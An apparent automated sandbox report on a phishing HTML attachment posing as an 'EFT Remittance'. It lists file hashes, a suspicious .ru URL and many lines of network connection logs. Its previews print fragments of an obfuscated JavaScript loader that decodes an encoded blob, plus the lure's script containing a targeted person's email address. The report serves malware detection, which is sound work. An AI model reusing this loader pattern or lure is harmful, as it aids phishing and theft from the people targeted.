                                    Preview: var HAXozMxoTpgrLgCq = document.createElement("script");..HAXozMxoTpgrLgCq.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(HAXozMxoTpgrLgCq);..HAXozMxoTpgrLgCq.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoibGMxWEJ0SjRIT2Naa3h0VUlINnliaG1kdlNOWTZmNU9SSHpJZ3pvNkNkdGlwR2lYcHhlbGFJb2JCMmNRZG84TXZXckMxeXI2RmRcL3ROZ3RFNlZndURRWVBjTHVlYnNKNWVaQ0VsOWxVQ1p3WmpFUTlTNDk0OUppRFU5dVd2WXAwV3hZVTJlMnNJanMrRHBRU2R2cFNHR1lMOVZRdStQa2hmalhCN1JxakR1VE9xWTk5bDdyazFEcWx1QWU0N0NpeU1NbVYzaDZpcjZPQndQd0huZE9lVU1WK1RIYmNqV0NOZkQ1MDFSc3NqY01SRGd3czBUazE5eTh1ZFhKZG9jQjZEb2NIY2p6Qnc0eVlKYmlsVWh0XC8yWndLWGNmWm9HYUtOdTJYY0kreGxwSUs4MmFLUUc2NFhxV1ZDVHdVZklcL1hLOGFpNGhwSXVuYmZ4OHBMQzFEKzhPUTBLNVwvOTdINjZINHQ3dDdkRlZ3NlBjMmhudDZZNG5OaUR5Tk0yREt2V09ab3l5TCt0XC9DSjVuUnM3S2xRNlpOZXNCNk9sY2c2bTNZdjlJSWY0Ukk1OE9RdnVMMloxRlFOSXp2K0orWHVua1dlZXcyQVh5eFEydHo1ejNRb2VyS0RmOUl3N0Z5WWJldUxYS00xaGxGYTZnOERNTXhOVjYzNEpaS3V4UHFqVWd5REdIXC93SEdlK0
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:very short file (no magic)
                                    Category:downloaded
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    URL:https://hjhyx.br-izeffs.ru/tatay$ylatfyo
                                    Preview:1
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (47992), with no line terminators
                                    Category:dropped
                                    Size (bytes):47992
                                    Entropy (8bit):5.605846858683577
                                    Encrypted:false
                                    SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                    MD5:CF3402D7483B127DED4069D651EA4A22
                                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                    Malicious:false
                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text
                                    Category:downloaded
                                    Size (bytes):3992
                                    Entropy (8bit):5.591011855888861
                                    Encrypted:false
                                    SSDEEP:96:wOEaCgOEa3FZOfOEaiOEaEJc+ujOEaUNzOpaCgOpa3FZOfOpaiOpaEJc+ujOpaUu:/Cvmo1AVSCSmBMAsX
                                    MD5:2090BEB037F32795B478A4EFC49169FD
                                    SHA1:B9855F15009536715C099A558F22B1CE904BF6A7
                                    SHA-256:D6007057C57B5631CBF65083E601AA576397B0487F11C9DA06F80D1F9A3F7F01
                                    SHA-512:438DB9686A150E28DF1D75594D1A8646641CB5E03E7E4A456AF0014A1A7BC064597D17999BF4C91F7BF0A1618339D91390B73237FDA2EB539333D0FD5E3B835F
                                    Malicious:false
                                    URL:https://fonts.googleapis.com/css2?family=Oswald:wght@400;700&display=swap
                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlbHYjedg.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlSHYjedg.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlZHYjedg.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (47992), with no line terminators
                                    Category:downloaded
                                    Size (bytes):47992
                                    Entropy (8bit):5.605846858683577
                                    Encrypted:false
                                    SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                    MD5:CF3402D7483B127DED4069D651EA4A22
                                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                    Malicious:false
                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                    File type:HTML document, ASCII text, with very long lines (319), with CRLF line terminators
                                    Entropy (8bit):5.8992868466972
                                    TrID:
                                    • HyperText Markup Language (12001/1) 29.26%
                                    • HyperText Markup Language (12001/1) 29.26%
                                    • HyperText Markup Language (11001/1) 26.83%
                                    • HyperText Markup Language (6006/1) 14.65%
                                    File name:EFT Remittance_(Rtotino)CQDM.html
                                    File size:810 bytes
                                    MD5:5e1913816428892f3dcd7006c9777d09
                                    SHA1:204fcb156c7531cf6dbcf94ab6c231731223cc85
                                    SHA256:604035b19d0564f9e1552f0ea20ccb0415ef8e400a122ccb849b55f9f69e248a
                                    SHA512:dcb730f40a1927fbd3f23f4424fa2c8aadc9ddd5c5dc2cc600cdbec039136284e2b4b6db2fca61052f4d99a860a95dbe990fafa94711114f8101c3a2a08fe101
                                    SSDEEP:24:kHS/RH3Z9kMKliB3oJ9tLp9qwVvqksdemtJI:zH3Z1KcB3oJTLzqw0ksdfM
                                    TLSH:CA012019EEB0C41189BDA2D11B9AA090EC36C800B126CE6CB9D41954EFAF55CC5E7FF8
                                    File Content Preview:<html><head><meta charset="UTF-8"></head><body><script>NfnOSY = '#Mrtotino@grassicpas.com';....(function(){ .. const ecQeeT = (nvJxMm,KKccUX) => {.. let rtSNfx = "";.. for(let QIGRSk=0;QIGRSk<nvJxMm.length;QIGRSk++){.. rtSNfx += String.fromCh
                                    TimestampSource PortDest PortSource IPDest IP
                                    Feb 19, 2025 20:39:53.552563906 CET49674443192.168.2.6173.222.162.64
                                    Feb 19, 2025 20:39:53.552572966 CET49673443192.168.2.6173.222.162.64
                                    Feb 19, 2025 20:39:53.849406958 CET49672443192.168.2.6173.222.162.64
                                    Feb 19, 2025 20:40:02.260232925 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:02.260286093 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:02.260365009 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:02.261585951 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:02.261605024 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:02.285474062 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:02.285482883 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:02.285547018 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:02.286103010 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:02.286109924 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:02.903565884 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:02.903958082 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:02.903963089 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:02.905493975 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:02.905576944 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:02.906863928 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:02.906920910 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:02.907138109 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:02.947326899 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:02.983520031 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:02.983532906 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:03.071825981 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:03.072072983 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:03.096297026 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:03.247054100 CET49673443192.168.2.6173.222.162.64
                                    Feb 19, 2025 20:40:03.291249037 CET49674443192.168.2.6173.222.162.64
                                    Feb 19, 2025 20:40:03.294550896 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:03.294579029 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:03.294941902 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:03.300415993 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:03.300487041 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:03.300494909 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:03.300668955 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:03.332335949 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:03.332357883 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:03.332416058 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:03.332422018 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:03.332465887 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:03.347326040 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:03.351425886 CET49713443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:03.351442099 CET44349713103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:03.370024920 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.370054960 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.370197058 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.370440960 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.370450974 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.424107075 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:03.424140930 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:03.424206972 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:03.424413919 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:03.424424887 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:03.495960951 CET49672443192.168.2.6173.222.162.64
                                    Feb 19, 2025 20:40:03.510183096 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:03.511010885 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:03.511081934 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:03.511573076 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:03.511586905 CET4434970940.115.3.253192.168.2.6
                                    Feb 19, 2025 20:40:03.511614084 CET49709443192.168.2.640.115.3.253
                                    Feb 19, 2025 20:40:03.832344055 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.832820892 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.832834005 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.833849907 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.833911896 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.840018988 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.840090036 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.840226889 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.840236902 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.947330952 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.976121902 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976246119 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976288080 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.976298094 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976386070 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976423979 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.976430893 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976623058 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976663113 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.976667881 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976733923 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976762056 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976767063 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.976773977 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.976804972 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.981620073 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.981718063 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:03.981751919 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:03.981756926 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.057013988 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.058146954 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.058526039 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:04.058551073 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.059617996 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.059684038 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:04.060154915 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:04.060211897 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.060400009 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:04.060405970 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.061845064 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.061932087 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.061973095 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.061980009 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.062367916 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.062396049 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.062407017 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.062412024 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.062439919 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.062449932 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.062453985 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.062484026 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.063136101 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.063189030 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.063220024 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.063222885 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.063227892 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.063261986 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.063267946 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.064069033 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.064105034 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.064109087 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.064171076 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.064223051 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.064227104 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.064933062 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.064963102 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.064974070 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.064979076 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.065002918 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.065011024 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.065015078 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.065053940 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.103365898 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.103497982 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.103544950 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.104376078 CET49718443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.104393959 CET44349718104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.239814043 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.239856958 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.239923954 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.240214109 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.240222931 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.249241114 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:04.316622019 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.316641092 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.316690922 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:04.316714048 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.316756010 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:04.319840908 CET49719443192.168.2.6103.83.194.5
                                    Feb 19, 2025 20:40:04.319864988 CET44349719103.83.194.5192.168.2.6
                                    Feb 19, 2025 20:40:04.358478069 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.358519077 CET44349721104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.358578920 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.359446049 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.359488010 CET44349722104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.359539986 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.359761000 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.359775066 CET44349721104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.360008955 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.360018969 CET44349722104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.715593100 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.716244936 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.716263056 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.717343092 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.717536926 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.717875004 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.717936993 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.718094110 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.718100071 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.831792116 CET44349722104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.832447052 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.832459927 CET44349722104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.834044933 CET44349722104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.834165096 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.836477995 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.836601019 CET44349722104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.836626053 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.836792946 CET44349722104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.836811066 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.837019920 CET49722443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.837610006 CET44349721104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.837609053 CET49723443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.837649107 CET44349723104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.837816954 CET49723443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.837816954 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.837842941 CET44349721104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.838021040 CET49723443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.838032961 CET44349723104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.838732004 CET44349721104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.838788986 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.839103937 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.839104891 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.839152098 CET44349721104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.839170933 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.839242935 CET49721443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.839395046 CET49724443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.839432955 CET44349724104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.839641094 CET49724443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.839723110 CET49724443192.168.2.6104.21.48.1
                                    Feb 19, 2025 20:40:04.839735985 CET44349724104.21.48.1192.168.2.6
                                    Feb 19, 2025 20:40:04.851262093 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.851305008 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.851327896 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.851340055 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.851603985 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.851612091 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.851646900 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.852109909 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.852153063 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.852170944 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.852178097 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.852215052 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.856452942 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.856512070 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.856530905 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.856538057 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.856637001 CET49720443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:04.856642008 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.940596104 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.940645933 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.940674067 CET44349720104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:04.940705061 CET44349720104.17.24.14192.168.2.6
